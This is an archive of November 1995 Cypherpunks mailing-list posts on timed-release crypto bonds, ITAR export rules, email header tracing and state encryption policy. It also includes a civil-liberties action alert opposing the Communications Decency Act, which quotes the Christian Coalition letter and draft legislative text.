>I will let you know. Otherwise, you may inspect the documents at the
>DPS, 112 State Street, Montpelier on November 14 as provided by
>statute.
>
> Since you requested my reply by e-mail, I am assuming that this
>message will suffice as "written notice" under the Access to Public
>Records law. Please let me know if you would prefer a response by
>ordinary mail.
>
> Thank you for your inquiry and continuing interest in these
>matters.
> Sincerely,
>
> Geoffrey Commons, Special Counsel
>

Stephen Whitaker

Design Access Network              802.479.6118
Post Office Box 1331               whitaker at sover.net
Montpelier, Vermont 05601-1331     PGP public key available

From shields at tembel.org Tue Nov 7 02:42:27 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 18:42:27 +0800
Subject: Timed-release crypto and information economics
In-Reply-To:
Message-ID: <47ncgr$ji6@yage.tembel.org>

-----BEGIN PGP SIGNED MESSAGE-----

In article , Timothy C. May wrote:
> This seems to be saying the same thing. In both cases, "Alice" is either
> distributing a message to "Bob," "Charles," "Donna," etc., with instructions
> not to return the pieces until Date X, or is holding onto a sealed message
> but asking that the decryption keys not be returned until Date X. I don't
> see the real difference, modulo some minor factors. In neither case can the
> original message be reconstructed unless n out of m of the escrow agents
> provide the pieces.

Here are some attacks where my scheme is more resistant. I'll suppose that Alice is writing a bond, i.e., time-delayed cash, to Bob.

1. Alice does not really write a bond

In my plan, Alice gives Bob the message along with a certificate saying that it is a bond. If the message is actually not a bond, Bob can demonstrate fraud upon the maturity date without revealing his identity, by posting the now-readable message along with the contradictory signed statement from Alice.

In your plan, Alice cannot provide the actual message to Bob, nor prove that she even sent anything through the blind remailer network.
Bob would have to ask her to sign a certificate saying that she wrote a bond to Bob for $n to mature on date X; she may not be willing to admit that in a publicly demonstrable way. And if she defrauded Bob, he cannot prove he did not receive a bond. 2. The crypto houses lose keys/messages In my plan, the crypto house's signature on the public key it issues guarantees that the secret key will be available upon the maturity date. If the house loses the secret key, then anyone can prove this, again anonymously, by publishing the signed public key and asking anyone to try to purchase the corresponding secret key. The house cannot say it is a false claim. The unreliable house hemorrhages reputation, and Bob still has his money as long as n houses were reliable. In fact, even if Bob can't trust n houses, he can still hedge. He would just buy a futures coupon saying that the house in question will lose a key. This is a classic use of hedging, and it allows him to recover his money, anonymously. In your plan, you just have to hope the remailers don't lose more than m-n parts. You rely on reputation-raters to judge reliability in a probabilistic manner. This works ok currently, with amateur remailers, but not in a future world held to the 100% standards of financial reliability. (And those standards are very high. Consider the public reaction if you saw proof that a bank had "lost" someone's checking account, one among a million.) 3. The crypto houses leak keys/messages In my plan, this is ok. You need both the keys *and the message* to decrypt. Only Bob holds the message. (It's axiomatic that you can keep a secret out of self-interest; your personal private key is such a secret.) In fact, at the maturity date, the secret keys will become available to anyone, and Bob still won't be hurt.
Meanwhile, crackers have incentive to steal keys even without breaking messages, because they can use them to make a profit on "Megahouse leaks keys" futures, by posting the secret key matching a signed public key. This can be anonymous, or they can use it to raise their nym's reputation among crackers. Because Megahouse knows it will be caught *every time* it leaks, it must keep 100% financial-quality security. This is an excellent failure mode because all failures will be public. In your plan, you just have to hope fewer than n pieces are made available to the cracking ring. And when you get a bond consisting of double-spent bills, you can't tell who broke security. This is intractable for a reputation-rater to determine to the necessary standards of accuracy. 4. Alice leaks the message This is "fraud through negligence" and is treated as in case 1. If Bob thinks it's likely, he can hedge by buying a "Alice shown untrustworthy" futures coupon. (Those will be *so* useful.) Because of the two-part design of a delayed message, it takes collusion by those in possession of ciphertext *and* keys to unseal a message. Before the maturity date, only Alice and Bob have the message, and only the banks have the keys. The message is of value only in that it will be valuable in the future along with the then-available secret keys. (Or, I suppose, possibly to prove fraud; that's of even more value.) All collusion can be righted, everything is anonymous unless reputations are involved, and all fraud is publicly exposed. These are interesting properties. -- Shields. From junger at pdj2-ra.F-REMOTE.CWRU.Edu Tue Nov 7 05:19:20 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D.
Junger) Date: Tue, 7 Nov 1995 21:19:20 +0800 Subject: Exporting software doesn't mean exporting (was: Re: lp ?) In-Reply-To: Message-ID: Simon Spero writes: : On Mon, 6 Nov 1995, Peter D. Junger wrote: : : > : > Don't blame this on my being a lawyer; blame it on some very sick : > people in the Office of Defense Trade Controls and in the NSA. : : I think it's unfair to call the people at the ODTC and the NSA sick; : during the cold war, such restrictions did make some sense; in : particular, controlling the export of high-performance encryption : hardware does make it harder for other countries to deploy ubiquitous : strong encryption, particularly in the less developed countries, and : particularly for chips that required exotic fabrication (the soviet union : never had really good mass-production facilities). The ones I was suggesting are sick are the ones who drafted the definition of ``export'' and of ``technical data'' in the ITAR. Would you consider it more appropriate if I called them perverse? -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From junger at pdj2-ra.F-REMOTE.CWRU.Edu Tue Nov 7 05:25:25 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Tue, 7 Nov 1995 21:25:25 +0800 Subject: Exporting software doesn't mean exporting (was: Re: lp ?) In-Reply-To: <199511070405.XAA14913@jekyll.piermont.com> Message-ID: "Perry E. Metzger" writes: : "Peter D. Junger" writes: : : > If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode : > to a German businessman there, that is literally a violation of the : > ITAR. : : Where the hell did you get that idea? From Section 120.17 of the ITAR which provides: _Export_ means: . . . . (4) Disclosing (including oral or visual disclosure) or transferring technical data to a foreign person, whether in the United States or abroad . . . .
(And technical data is (baroquely) defined in Section 120.10 as including certain software, including cryptographic software.) : The ITAR clearly does not apply : to foreigners disclosing things to each other outside the United : States. Where the hell did you get that idea? : I've read it and I can't see how it could possibly be so : interpreted. I'm not a lawyer, but this interpretation is so bizarre : as to be almost untenable. I can clearly see that a U.S. person : talking about DES to a foreign person can be a violation under the : language in the regulations, but there is no way on earth to interpret : the regulations as applying to foreigners abroad talking to other : foreigners outside the U.S. Go read the section that I quoted again. Where is there an exception for foreign persons who happen to be abroad? : > Don't expect the ITAR to make any sense. And don't think that you can : > apply logic to the ITAR and get logical results. It doesn't work that : > way. : I was under the impression, though, that the words meant what they : said. When did you change your mind? -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From cme at clark.net Tue Nov 7 06:12:37 1995 From: cme at clark.net (Carl Ellison) Date: Tue, 7 Nov 1995 22:12:37 +0800 Subject: it could be worse Message-ID: <199511070410.XAA29659@clark.net> ``According to the former head of Romania's secret police, Ion Mihai Pacepa, there had been ten million microphones in a country of twenty-three million people. That would mean that nearly everyone had been listened to and then blackmailed into listening and reporting on others. A maze of psychic tunnels led from one person to another.'' [Andrei Codrescu, "The Hole In The Flag", pp. 21-22] From droelke at spirit.aud.alcatel.com Tue Nov 7 06:29:12 1995 From: droelke at spirit.aud.alcatel.com (Daniel R.
Oelke) Date: Tue, 7 Nov 1995 22:29:12 +0800 Subject: toolkits? Message-ID: <9511071418.AA25542@spirit.aud.alcatel.com> Timothy C. May wrote: > > At 12:41 AM 11/7/95, Stephen Whitaker wrote: > > >just might have a prayer of doing it right, whatever that is. What would it > >look like if secure communications and anonymity were designed in from the > >start? Is this what Sameer is doing in Bezerkeley? > > > >What machines are considered minimum requirements to use these tools? What > >are the essential reference works? > > "Security and anonymity" are not matters for government to ensure. > [...] > I urge you, Stephen, to read up on encryption and the benefits contained > therein. Looking to your state capital to secure your communications is a > lose. > Tim - I think your libertarian side is showing here.... Not that this is a bad thing, but I think there are some things that state governments can and/or should do. First off - avoid trying to legislate minute details of any encryption or signature scheme. Bureaucrats trying to understand, much less control technical things is doomed to fail. (take GOSIP as a prime example) Second - push for legal acceptance of digital signatures and acceptance of privacy through encryption. I believe Utah has taken a strong step in this direction. Most people, businesses, and courts won't accept digital contracts and the like until there is more of a sound set of laws behind them. Strong laws against government snooping or against anti-encryption or anti-anonymous laws are a good thing IMO. Besides - laws like that will let the bureaucrats drown themselves in their own paperwork making sure they follow their own rules - and keep them out of our hair. ;-) Third - provide services to the citizenry. For example - provide a public key server. Or how about a digital time-stamping service.
If the crap was kept out of these services, and they were free for anyone to use, then it would advance the idea of encouraging people to use crypto in their daily lives. Warning - Although I think there are some good things that governments can do, it is also very important to watch out for "sabotage" by the government. Governments tend to like control too much and by trying to maintain control, reverse a useful service to one that is a dis-service to the people. In general, if governments get out of the way, people will take care of problems themselves. Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From perry at piermont.com Tue Nov 7 06:31:08 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 7 Nov 1995 22:31:08 +0800 Subject: Exporting software doesn't mean exporting (was: Re: lp ?) In-Reply-To: <9511070341.AA15892@zorch.w3.org> Message-ID: <199511070400.XAA14905@jekyll.piermont.com> hallam at w3.org writes: > One of the many problems in Perry's approach is that an international treaty > is in essence a contract between governments. Were that the case, citizens couldn't sue to have provisions impacting them enforced, but the fact of the matter is that they can. > Perry's somewhat offensive language is not a substitute for an argument. Thank you for the ad hominem. > I think I would take Perry's disbelief that a person is a lawyer because > he disagrees with him as reflecting more on Perry than anyone else. I'm not entirely sure that the international telecoms treaties cover this, but both the gentleman I was conversing with and I appeared to have assumed for purposes of discussion that they did. Given that, the notion that international telecoms treaties are superseded by the ITARs does indeed give one pause to wonder.
Perry From carolann at censored.org Tue Nov 7 06:32:16 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Tue, 7 Nov 1995 22:32:16 +0800 Subject: Request for URL'S Message-ID: <199511062033.UAA17159@mailhost1.primenet.com> I have trebled my WWW site size. It is now a comfortable 15 megs big. I'd love to make a Cypherpunk URL page, so if you will send your five favorite URL's I'll put them all on a page like The Dreams Page, (http:www.primenet.com/~carolab/dreams.html) and turn it loose on the net. Nov. 15th is when I will edit up the page. Love Always, Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- http://dcs.ex.ac.uk/~aba/export/ From tcmay at got.net Tue Nov 7 06:36:20 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 7 Nov 1995 22:36:20 +0800 Subject: [NOISE] DejaNews all over again--a URL for Usenet Searching Message-ID: At 5:49 PM 11/6/95, Peter Trei wrote: >> I usually avoid passing on URLs of interesting sites, in the name of >> conserving bandwidth (*), but this one really has me jazzed: >> http://dejanews.com/ >> It allows searching of Usenet archives (a few months' worth, from what I >> can see). > >Unfortunately, it does not archive alt, soc, talk, or *.binaries (the >latter is >probably a blessing). Specialized news grepping is still useful - see >http://www.iii.net/users/trei/usenet.html for an example. excite Netsearch (http://www.excite.com/) indexes all or part of alt, soc, and talk groups.
(I say "all or part" because I obviously cannot verify that it indexes all posts to these groups just by verifying that it indexes at least _some_ posts in these groups.) It even indexes the *.binaries.* groups, as I just learned. (Paul Robichaux told me about the http://www.excite.com/ URL.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From adam at lighthouse.homeport.org Tue Nov 7 06:38:58 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Tue, 7 Nov 1995 22:38:58 +0800 Subject: forging headers In-Reply-To: <199511070249.SAA14921@well.com> Message-ID: <199511070404.XAA04542@homeport.org> You need to send the entire headers, including such things as received lines. Looking over those lines carefully will probably provide some clues. eg: >From owner-cypherpunks at toad.com Sun Sep 24 20:14:32 1995 >Return-Path: owner-cypherpunks at toad.com >Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by >homeport.org (8.6.9/8.6.9) with ESMTP id UAA18842 for >; Sun, 24 Sep 1995 20:14:30 -0400 >Received: from toad.com by relay3.UU.NET with SMTP > id QQziqi14036; Sun, 24 Sep 1995 20:10:07 -0400 >Received: by toad.com id AA02191; Sun, 24 Sep 95 17:05:32 PDT >Received: from crypto.com by toad.com id AA02182; Sun, 24 Sep 95 >17:05:26 PDT >Received: from tpc.crypto.com by crypto.com Sun, 24 Sep 1995 20:16:16 >-0400 >Message-Id: <199509250016.UAA19204 at crypto.com> | So I got this message. How would someone identify the sender of this | message?
I'm writing an article on anonymity, with some discussion of | remailers, and want to argue that forging already permits people to raise | the costs of tracing significantly, anonymous remailers or no. | | Lee | | >From: freeh at fbi.gov | >Date: Tue, 24 Oct 95 16:07:08 -0400 | >Apparently-To: tien at well.sf.ca.us | >X-UIDL: 814570964.056 | > | >> How difficult is it to forge headers? How difficult is it to trace a | >> message to the actual sender if the header is forged? | > | >Not very difficult at all (to forge, that is). This is a quick and dirty | >example that should be somewhat traceable. If you want pointers on how to | >trace it, post the whole thing, including headers, to cypherpunks. -- "It is seldom that liberty of any kind is lost all at once." -Hume From ACLUNATL at aol.com Tue Nov 7 06:40:29 1995 From: ACLUNATL at aol.com (ACLUNATL at aol.com) Date: Tue, 7 Nov 1995 22:40:29 +0800 Subject: Religious Right Threatens to Shut Down Net: Call NOW Message-ID: <951106134311_99292624@mail04.mail.aol.com> Here are the advocacy instructions for individuals opposed to the Federal Online Indecency Legislation that we promised last week. ======================================================================== CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT (SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END) Update: -Latest News: The Christian Coalition is pushing Congress to censor the net more heavily than even Sen. J.J. Exon ever imagined. There is the very real possibility that they may succeed. You should be very worried. We are. -What You Can Do Now: Follow the directions below and call House Speaker Gingrich and Senate Leader Dole. Implore them to allow parents to make choices for their children, instead of government censors. Volunteer to join the fight by helping organize in your home town. 
CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT Nov 2, 1995 PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT REDISTRIBUTE ONLY UNTIL December 1, 1995 REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS ________________________________________________________________________ CONTENTS The Latest News What You Can Do Now The letter from Ed Meese and the Christian Right Chronology of the CDA For More Information List Of Participating Organizations ________________________________________________________________________ THE LATEST NEWS Since the very first day that Senator J.J. Exon (D-NE) proposed censorship legislation for the Internet, the Christian Right has pushed for the most restrictive regulations they could think of. The Religious Right (which does not necessarily speak for all religious people concerned with this issue) recently tipped their hand in a letter to Sen. Larry Pressler (R-SD) and Rep. Thomas Bliley (R-VA) requesting a new and more restrictive net censorship proposal. There are essentially three new dangerous elements of their campaign to shut down cyberspace: INTERNET PROVIDERS, ONLINE SERVICES, AND LIBRARIES CRIMINALLY LIABLE FOR EXPRESSION ONLINE The Religious Right has proposed to hold anyone who provides access to the Internet or other interactive media, including online services providers, ISP's, BBS's, Libraries, and Schools, criminally liable for all speech carried on the network. In order to avoid liability under this provision, service providers would be forced to monitor user's electronic communications to be assured that no "indecent" material is transmitted across their networks. This proposal is MORE RESTRICTIVE than the Exon Communications Decency Act, or any other net censorship legislation currently in Congress. In their letter to Congress, the Religious Right says: [Providers] would simply be required to avoid KNOWING violations of the law. 
[emphasis added] However, the "knowing" standard is vague enough that the mere knowledge that such material exists could be sufficient to trigger criminal liability. A single complaint or even a news report could force a service provider to take down a web page, remove posts to chat rooms or other discussion forums, or shut down listservs in order to avoid going to jail and facing huge fines. A STANDARD FOR INDECENCY The proposals pushed by the Christian Coalition rely on the unconstitutional "indecency standard". Like the Exon Communications Decency Act, the Christian Coalition seeks to regulate all indecent speech online. Indecency is a broad category that includes everything from George Carlin's "seven dirty words" to such classic novels as "The Catcher in the Rye" and "Lady Chatterley's Lover". The Supreme Court has ruled that restrictions on indecent speech are Constitutional only if they rely on the "least restrictive means". Broad indecency restrictions on interactive media do not satisfy the "least restrictive means" test, because interactive media allows users and parents tremendous control over the information they receive. Any legislation which attempts to apply an indecency restriction to the Internet is unconstitutional on its face. The Christian Coalition's proposal that relies on an indecency restriction contemplates dumbing down every conversation, web page, newsgroup, and mailing list on the Internet to the level of what is not offensive to children. What kind of discussions between adults are possible in an arena where everything has been reduced to the level of the Lion King? UNPRECEDENTED CONTROL OVER ONLINE SPEECH FOR THE FCC The Christian Coalition would give the FCC broad jurisdiction over cyberspace. It would allow the FCC jurisdiction over your online speech, and over the design of Internet software, such as web browsers and filtering programs that parents can use to control their children's access to the Internet.
The Internet has developed from a government project to a market-driven economic boom for thousands of businesses. Giving the FCC authority over this medium would significantly hinder the growth of this new industry. ________________________________________________________________________ WHAT YOU CAN DO NOW 1. The proposals from the Religious Right will literally destroy online speech as we know it. The odds of stopping this are not certain. There is a very real chance that this legislation will pass, and we will experience a period of uncertainty and chilling of speech while an appropriate test case attempts to reach the Supreme Court (should it even get there!) The Religious Right has a strong grass-roots network. We need to counter their energy and ensure cyberspace is not lost due to them. IMMEDIATELY CALL House Speaker Gingrich (R-GA) and Senate Leader Dole (R-KS) and urge them to oppose the Christian Coalition's proposal.
Name, Address, and Party    Phone            Fax
========================    ==============   ==============
R GA Gingrich, Newt         1-202-225-4501   1-202-225-4656
R KS Dole, Robert           1-202-224-6521   1-202-224-8952
If you're at a loss for words, try one of the following: Please oppose the recent proposal from the Religious Right to censor the Internet. The only effective way to address children's access to the Internet is through parental control tools outlined by the Cox/White/Wyden approach. or As a religious person and a parent, I oppose the Religious Right's attempts to censor the Internet. I am the best person to monitor my child's access to the Internet using parental control tools as outlined in the Cox/White/Wyden approach. 2. Join the online fight by becoming a volunteer for your district! Check to see if your legislator is in the list below.
If they are not, consult the free ZIPPER service that matches Zip Codes to Congressional districts with about 85% accuracy at: URL:http://www.stardot.com/~lukeseem/zip.html The conference committee legislators are: House: Barr (R-GA), Barton (R-TX), Berman (R-CA), Bliley (R-VA), Boucher (D-VA), Brown (D-OH), Bryant (D-TX), Buyer (R-IN), Conyers (D-MI), Dingell (D-MI), Eshoo (D-CA), Fields (R-TX), Flanagan (R-IL), Frisa (R-NY), Gallegly (R-CA), Goodlatte (R-VA), Gordon (D-TN), Hastert (R-IL), Hoke (R-OH), Hyde (R-IL), Jackson-Lee (D-TX), Klug (R-WI), Lincoln (D-AR), Markey (D-MA), Moorhead (R-CA), Oxley (R-OH), Paxon (R-NY), Rush (D-IL), Schaefer (R-CO), Schroeder (D-CO), Scott (D-VA), Stearns (R-FL), White (R-WA) Senate: Burns (R-MT), Exon (D-NE), Ford (D-KY), Gorton (R-WA), Hollings (D-SC), Inouye (D-HI), Lott (R-MS), McCain (R-AZ), Pressler (R-SD), Rockefeller (D-WV), Stevens (R-AK) If your legislator is on the conference committee, you have a chance to influence their vote on this issue with your power as a constituent. Volunteer to help educate your legislator by sending mail to volunteer at vtw.org. A coalition volunteer will be in touch with you. You can start working to help spread the word in your district by sending this letter to five friends. Ask them to call Dole and Gingrich as well. 3. The People for the American Way (PFAW) and the American Civil Liberties Union are organizing a letter from ORGANIZATIONS to the Conference Committee to oppose the censorship provisions. If you are a representative of an organization that would like to sign on to this letter, you should contact jlesser at pfaw.org IMMEDIATELY. 4. We can't suggest relaxing at this point. The stakes are too high, and the risk is too great. Everything now hangs in the balance. ________________________________________________________________________ THE LETTER FROM ED MEESE AND THE CHRISTIAN RIGHT October 16, 1995 The Honorable Thomas J. Bliley, Jr.
Chairman Committee on Commerce United States House of Representatives Washington, DC 20515 The Honorable Larry Pressler, Chairman Committee on Commerce, Science, and Transportation United States Senate Washington, DC 20510 Re: Computer Pornography Provisions in Telecommunications Bill Dear Mr. Chairmen: We are writing to urge the conference committee seeking to reconcile the telecommunications bills passed by the House and Senate include in the final bill the strongest possible criminal law provisions to address the growing and immediate problem of computer pornography without any exemptions, defenses, or political favors of any kind accorded to those who knowingly participate in the distribution of obscenity to anyone or indecency to children. While there is no perfect solution to the problem of computer pornography, Congress could not hope to solve this problem by holding liable only some who are responsible for the problem. The recent Justice Department prosecution project targeting those who violated federal child pornography law using America On-Line is instructive in this regard. More than ninety individuals were targeted for prosecution although many others, perhaps as many as 3,000 according to one press report, were originally targeted by the Department of Justice as potential violators of child pornography laws. Apparently due to a shortage of investigative and prosecutorial resources, the project was limited. Since there are insufficient resources to investigate and prosecute but a fraction of those that are trafficking in child pornography by computer, then there will likely be even fewer resources available to investigate and prosecute those involved in obscenity and indecency. Thousands of individuals both in this country and abroad are regularly placing obscenity and indecency on the Internet. 
It is not possible to make anything more than a dent in the serious problem of computer pornography if Congress is willing to hold liable only those who place such material on the Internet while at the same time giving legal exemptions or defenses to service or access providers who profit from and are instrumental to the distribution of such material. The Justice Department normally targets the major offenders of laws. In obscenity cases prosecuted to date, it has targeted large companies which have been responsible for the nationwide distribution of obscenity and who have made large profits by violating federal laws. Prosecution of such companies has made a substantial impact in curbing the distribution of obscenity, with many such offenders going out of business altogether. So too will prosecution of access providers which _knowingly_ traffic in obscenity have a substantial impact, a far greater impact than just the prosecution of a person who places one or a few prohibited images on the Internet. Such a person could not traffic in pornography without the aid or facilitation of the service or access providers. Indeed, if Congress includes provisions protecting access or service providers in whatever bill is finally passed, it is likely that most in this country who are trafficking in indecency to children or obscenity would continue to do so since the threat of prosecution would be minuscule, given the numbers of those currently involved in this activity. It is also likely that those outside our country who are engaged in these activities would continue to do so since it would be nearly impossible to extradite them to the United States for prosecution. Thus, unless all who knowingly participate in such matters are subject to the law, the Internet will remain the same and Congress will have failed in its responsibilities to the children and families of America.
Federal law has traditionally assigned equal liability both for those who commit a crime and those who aid and abet a crime. See Title 18 U.S.C. Code Section 2: "(a) whoever [sic] commits an offense against the United States or aids, abets, councils [sic], commands, induces, or procures its commission, is punishable as a principle [sic]." Service or access providers who knowingly participate in the distribution of indecency to children or in obscenity to anyone are aiders and abettors in the commission of those crimes and thus should have liability under any law Congress passes. Current federal law on child pornography provides no exemption or defense for access providers. Thus, the child pornography law provides a strong deterrent against trafficking in child pornography for those who would otherwise knowingly participate in its distribution by computer whether pedophile or access provider. The changes in law which we support would not hold an access provider criminally liable for all illegal pornography on the Internet which their services may be used to obtain. Nor would it require that access providers check all communications to ensure that no violations of the law are occurring. They would simply be required to avoid knowing violations of the law. This is an obligation imposed on all citizens. Technology exists today for access providers, through a simple process, to target or flag and remove files containing objectionable material. We support the House-passed language insofar as it addresses obscenity by amendment Title 18, Sections 1462, 1465, and 1467 of the United States Code. The provision restricting transmission of indecency in the House-passed bill, an amendment to Section 1465, is inadequate, and we urge that it be substantially revised.
Attached is the specific language we support which includes the House passed language on obscenity and includes revisions on both the House passed language on indecency, which would amend Title 18 and the Senate-passed language on indecency, which would amend Title 47. The combination of these provisions, we believe, would provide effective laws to curb obscenity and indecency on the Internet by establishing that all who knowingly participate in the distribution or facilitation of obscenity to anyone or indecency to children would be subject to the law. Thank you for your concern and attention to this matter. [signed] Edwin Meese III Ralph Reed Christian Coalition Donald E. Wildmon American Family Association Alan Sears, Former Executive Director Atty General's Commission on Pornography Phyllis Shafly Eagle Forum Beverly LaHaye Concerned Women for America Reverend Louis P. Sheldon Traditional Values Coalition Jay Sekulow American Center for Law and Justice Paul Weyrich Free Congress Foundation Paul McGeady Morality in Media Len Munsil National Family Legal Foundation Robert Peters Morality in Media Kenneth Sukhia Former United States Attorney, N.D., FL Former Chairman, Atty General's Advisory Committee Subcommittee on Child Exploitation and Obscenity -------------------------- Section 1465 of Title 18, United States Code, is amended to punish distribution by computer of indecent material to minors by adding at the end the following: Whoever knowingly communicates, transmits, or makes available for communication or transmission, in or effecting interstate or foreign commerce an indecent communication by computer to any person the communicator or transmitter believes has not attained the age of 18 years of age, knowing that such communication will be obtained by a person believed to be under 18 years of age, shall be fined under this title or imprisoned not more than five years, or both. 
TITLE IV -- OBSCENE, HARASSING, AND WRONGFUL UTILIZATION OF TELECOMMUNICATIONS FACILITY SEC. 401. SHORT TITLE This title may be cited as the "Communications Decency Act of 1995". Sec. 402. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER THE COMMUNICATIONS ACT OF 1934 Section 223 (47 U.S.C. 223) is amended -- (1) by striking subsection (a) and inserting in lieu of [sic]: ``(a) Whoever-- ``(1) in the District of Columbia or in interstate or foreign communications -- ``(A) by means of telecommunications device knowingly-- ``(i) makes, creates, or solicits, and ``(ii) initiates the transmission of, any comment, request, suggestion, proposal, image, or other communication which is obscene, lewd, lascivious, filthy, or indecent, with intent to annoy, abuse, threaten, or harass another person; ``(B) makes a telephone call or utilizes a telecommunications device, whether or not conversation or communication ensues, without disclosing his identity and with intent to annoy, abuse, threaten, or harass any person at the called number or who receives the communication; ``(C) makes or causes the telephone of another repeatedly or continuously to ring, with intent to harass any person at the called number; or ``(D) makes repeated telephone calls or repeatedly initiates communication with a telecommunications device, during which conversation or communication ensues, solely to harass any person at the called number or who receives the communication; ``(2) knowingly permits any telecommunications facility under his control to be used for any activity prohibited by paragraph (1) with the intent that it be used for such activity, shall be fined not more than $100,000 or imprisoned not more than two years, or both.''; and (2) by adding at the end the following new subsections: ``(d) Whoever-- ``(1) knowingly within the United States or in foreign communications with the United States by means of telecommunications device makes or makes available any indecent 
communication in any form including any comment, request, suggestion, proposal, or image, to any person under 18 years of age regardless of whether the maker of such communication placed the call or initiated the communication; or ``(2) knowingly permits any telecommunications facility under such person's control to be used for an activity prohibited by paragraph (1) with the intent that it be used for such activity, shall be fined not more than $100,000 or imprisoned not more than two years or both. ``(e) Defenses to subsections (a) and (d), restrictions on access, judicial remedies respecting restrictions for persons providing information services and access to information services-- "(1) It is a defense to prosecution that a person has complied with regulations designed to restrict access to indecent communications to those 18 years old or older as enacted by the Federal Communications Commission which shall prepare final regulations within 120 days of the passage of this bill. Until such regulations become effective, it is a defense to prosecution that the person has blocked or restricted access to indecent communications to any person under 18 years of age through the use of verified credit card, adult access code, or adult personal identification number (PIN). Nothing in this subsection shall be construed to treat enhanced information services as common carriage." "(2) No cause of action may be brought in any court or any administrative agency against any person on account of any activity which is not in violation of any law punishable by criminal or civil penalty, which activity the person has taken in good faith to implement a defense authorized under this section or otherwise to restrict or prevent the transmission of, or access to, a communication specified in this section. 
(f) Nothing in this subsection shall preclude any State or local government from enacting and enforcing laws and regulations which do not result in the imposition of inconsistent obligations on the provision of interstate services. Nothing in this subsection shall preclude any State or local government from governing conduct not covered by subsection (d)(2)."

(g) Nothing in subsection (a), (d), or (e) or in the defenses to prosecution under (e) shall be construed to affect or limit the application or enforcement of any other Federal law.

(h) The use of the term 'telecommunications device' in this section shall not impose new obligations on (one-way) broadcast radio or (one-way) broadcast television operators licensed by the Commission or (one-way) cable services registered with the Federal Communications Commission and covered by obscenity and indecency provisions elsewhere in this Act.

Sec. 403. OBSCENE PROGRAMMING ON CABLE TELEVISION.

Section 639 (47 U.S.C. 559) is amended by striking "10,000" and inserting "$100,000"

Sec. 404. BROADCASTING OBSCENE LANGUAGE ON THE RADIO.

Section 1466 of Title 18, United States Code, is amended by striking out "$10,000" and inserting "$100,000".

Sec. 405 SEPARABILITY

"(a) If any provision of this Title, including amendments to this Title of [sic] the application thereof to any person or circumstance is held invalid, the remainder of this Title and the application of such provision to other persons or circumstances shall not be affected thereby."

________________________________________________________________________
CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

Sep 26, '95  Sen. Russ Feingold urges committee members to drop Managers Amendment and the CDA from the Telecommunications Deregulation bill
Aug 4, '95   House passes HR1555 which goes into conference with S652.
Aug 4, '95   House votes to attach Managers Amendment (which contains new criminal penalties for speech online) to Telecommunications Reform bill (HR1555).
Aug 4, '95   House votes 421-4 to attach HR1978 to Telecommunications Reform bill (HR1555).
Jun 30, '95  Cox and Wyden introduce the "Internet Freedom and Family Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95  Several prominent House members publicly announce their opposition to the CDA, including Rep. Newt Gingrich (R-GA), Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95  The Senate passes the CDA as attached to the Telecomm reform bill (S 652) by a vote of 84-16. The Leahy bill (S 714) is not passed.
May 24, '95  The House Telecomm Reform bill (HR 1555) leaves committee in the House with the Leahy alternative attached to it, thanks to Rep. Ron Klink of (D-PA). The Communications Decency Act is not attached to it.
Apr 7, '95   Sen. Leahy (D-VT) introduces S.714, an alternative to the Exon/Gorton bill, which commissions the Dept. of Justice to study the problem to see if additional legislation (such as the CDA) is necessary.
Mar 23, '95  S314 amended and attached to the telecommunications reform bill by Sen. Gorton (R-WA). Language provides some provider protection, but continues to infringe upon email privacy and free speech.
Feb 21, '95  HR1004 referred to the House Commerce and Judiciary committees
Feb 21, '95  HR1004 introduced by Rep. Johnson (D-SD)
Feb 1, '95   S314 referred to the Senate Commerce committee
Feb 1, '95   S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________
FOR MORE INFORMATION

Web Sites
    URL:http://www.vtw.org/exon/
    URL:http://epic.org/
    URL:http://www.eff.org/pub/Alerts/
    URL:http://www.cdt.org/cda.html
    URL:http://outpost.callnet.com/outpost.html

FTP Archives
    URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
    URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
    URL:gopher://gopher.panix.com/11/vtw/exon
    URL:gopher://gopher.eff.org/11/Alerts

Email:
    vtw at vtw.org (put "send alert" in the subject line for the latest alert, or "send cdafaq" for the CDA FAQ)
    cda-info at cdt.org (General CDA information)
    cda-stat at cdt.org (Current status of the CDA)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have joined forces on a single Congressional net campaign to stop the Communications Decency Act.

